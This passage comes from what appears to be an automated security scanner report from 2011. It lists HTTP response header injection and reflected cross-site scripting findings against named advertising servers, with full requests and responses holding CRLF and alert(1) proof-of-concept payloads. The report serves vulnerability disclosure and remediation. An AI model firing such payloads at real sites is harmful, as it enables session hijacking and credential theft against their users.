Set-Cookie: FFpb=305:54f5b
606b90e0140
,3654a';expires=Sun, 04 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=95:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=210
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:33 GMT
Content-Length: 950
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='54f5b

...[SNIP]...

4.2. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 386bc%0d%0a457ad93187f was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=386bc%0d%0a457ad93187f&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:386bc
457ad93187f
,54f5b;expires=Sun, 04 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=37:9:9:1:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:51 GMT
Content-Length: 948
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='386bc

...[SNIP]...

4.3. http://c7.zedo.com/utils/ecSet.js [v parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload 72e24%0d%0acc2e3ed201c was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=72e24%0d%0acc2e3ed201c&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: 72e24
cc2e3ed201c
;expires=Tue, 04 Oct 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=1466
Date: Sun, 04 Sep 2011 01:05:04 GMT
Connection: close



4.4. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 8a172%0d%0a0373f631884 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=LCN&si=8a172%0d%0a0373f631884&pi=-&xs=3&pu=http%253A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html%253Fifu%253Dhttp%25253A//www.google.com/trends/hottrends%25253Fq%25253Dsprint%252526date%25253D2011-9-3%252526sa%25253DX&df=1&v=6.0&cb=85182 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:51 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:21:51 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:06:51 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:06:51 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100211|17778^1315097086^1315100209|58dcd76bcc7cba0a0aa9256e^1315098376^1315100176|1777858dcd76b8a6d1b89539c8834^1315098377^1315100177|8a172
0373f631884
^1315098411^1315100211; path=/; expires=Sun, 04-Sep-11 01:36:51 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:06:51 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:06:51 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:06:51 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();


5. Cross-site scripting (reflected)
There are 121 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53bfc"><script>alert(1)</script>20c739125c2 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=53bfc"><script>alert(1)</script>20c739125c2&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8995059535480416422; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:05:50 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:05:49 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8995059535480416422&rnd=3834016449463094093&fpid=53bfc"><script>alert(1)</script>20c739125c2&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.2. http://ad.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a99"><script>alert(1)</script>d633ab318d4 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=6&sp=72a99"><script>alert(1)</script>d633ab318d4 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8995059535480416422; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:05:50 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:05:49 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8995059535480416422&rnd=3302508506972481702&fpid=6&nu=n&t=&sp=72a99"><script>alert(1)</script>d633ab318d4&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.3. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b566b'-alert(1)-'5473cd1b396 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=193b566b'-alert(1)-'5473cd1b396&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3I*!2a3C06.$K

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:02:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=9223372036854775807; path=/; expires=Sat, 03-Dec-2011 01:02:33 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 04 Sep 2011 01:02:33 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193b566b'-alert(1)-'5473cd1b396&external_user_id=9223372036854775807&expiration=0" width="0" height="0"/>');

5.4. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e2bb'-alert(1)-'8f47cdc553a was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match5e2bb'-alert(1)-'8f47cdc553a HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3I*!2a3C06.$K

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:02:53 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=9223372036854775807; path=/; expires=Sat, 03-Dec-2011 01:02:53 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 04 Sep 2011 01:02:53 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match5e2bb'-alert(1)-'8f47cdc553a?admeld_adprovider_id=193&external_user_id=9223372036854775807&expiration=0" width="0" height="0"/>');

5.5. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [height parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://affiliates.eblastengine.com
Path:   /Widgets/EmailSignup.aspx

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5c8f"style%3d"x%3aexpression(alert(1))"39952ff8d9c was submitted in the height parameter. This input was echoed as d5c8f"style="x:expression(alert(1))"39952ff8d9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Widgets/EmailSignup.aspx?wcguid=29DFC999-F0F3-482A-9516-C8414B36C6AD&height=100d5c8f"style%3d"x%3aexpression(alert(1))"39952ff8d9c&width=275 HTTP/1.1
Host: affiliates.eblastengine.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Sep 2011 01:04:01 GMT
Last-Modified: Sun, 04 Sep 2011 01:03:01 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sun, 04 Sep 2011 01:03:00 GMT
Content-Length: 6969


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Email S
...[SNIP]...
<table id="tblWidget" cellpadding="0" cellspacing="0" border="0" style="width:275px;height:100d5c8f"style="x:expression(alert(1))"39952ff8d9cpx;">
...[SNIP]...

5.6. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [wcguid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://affiliates.eblastengine.com
Path:   /Widgets/EmailSignup.aspx

Issue detail

The value of the wcguid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7d48"style%3d"x%3aexpression(alert(1))"2ce761eaace was submitted in the wcguid parameter. This input was echoed as e7d48"style="x:expression(alert(1))"2ce761eaace in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Widgets/EmailSignup.aspx?wcguid=29DFC999-F0F3-482A-9516-C8414B36C6ADe7d48"style%3d"x%3aexpression(alert(1))"2ce761eaace&height=100&width=275 HTTP/1.1
Host: affiliates.eblastengine.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Sep 2011 01:03:41 GMT
Last-Modified: Sun, 04 Sep 2011 01:02:41 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sun, 04 Sep 2011 01:02:41 GMT
Content-Length: 6922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Email S
...[SNIP]...
<input type="hidden" name="hdnWCGUID" id="hdnWCGUID" value="29DFC999-F0F3-482A-9516-C8414B36C6ADe7d48"style="x:expression(alert(1))"2ce761eaace" />
...[SNIP]...

5.7. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://affiliates.eblastengine.com
Path:   /Widgets/EmailSignup.aspx

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be580"style%3d"x%3aexpression(alert(1))"d63f3064f0 was submitted in the width parameter. This input was echoed as be580"style="x:expression(alert(1))"d63f3064f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Widgets/EmailSignup.aspx?wcguid=29DFC999-F0F3-482A-9516-C8414B36C6AD&height=100&width=275be580"style%3d"x%3aexpression(alert(1))"d63f3064f0 HTTP/1.1
Host: affiliates.eblastengine.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Sep 2011 01:04:11 GMT
Last-Modified: Sun, 04 Sep 2011 01:03:11 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sun, 04 Sep 2011 01:03:10 GMT
Content-Length: 6967


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Email S
...[SNIP]...
<table id="tblWidget" cellpadding="0" cellspacing="0" border="0" style="width:275be580"style="x:expression(alert(1))"d63f3064f0px;height:100px;">
...[SNIP]...

5.8. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88303-3335-5

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16e33'-alert(1)-'29065005ae7 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13966-88303-3335-5?mpt=111967816e33'-alert(1)-'29065005ae7&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 545
Date: Sun, 04 Sep 2011 00:45:45 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/x;245665919;0-0;1;43087964;3454-728/90;43451397/43469184/1;;~okv=;type=leaderboard;sz=728x90;tile=1;vbc=cfa;articleID=USTRE78222D20110903;~aopt=6/1/ff/1;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88303-3335-5?mpt=111967816e33'-alert(1)-'29065005ae7">
...[SNIP]...

5.9. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88303-3335-5

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed8b5'%3balert(1)//13bb1e92c92 was submitted in the mpvc parameter. This input was echoed as ed8b5';alert(1)//13bb1e92c92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

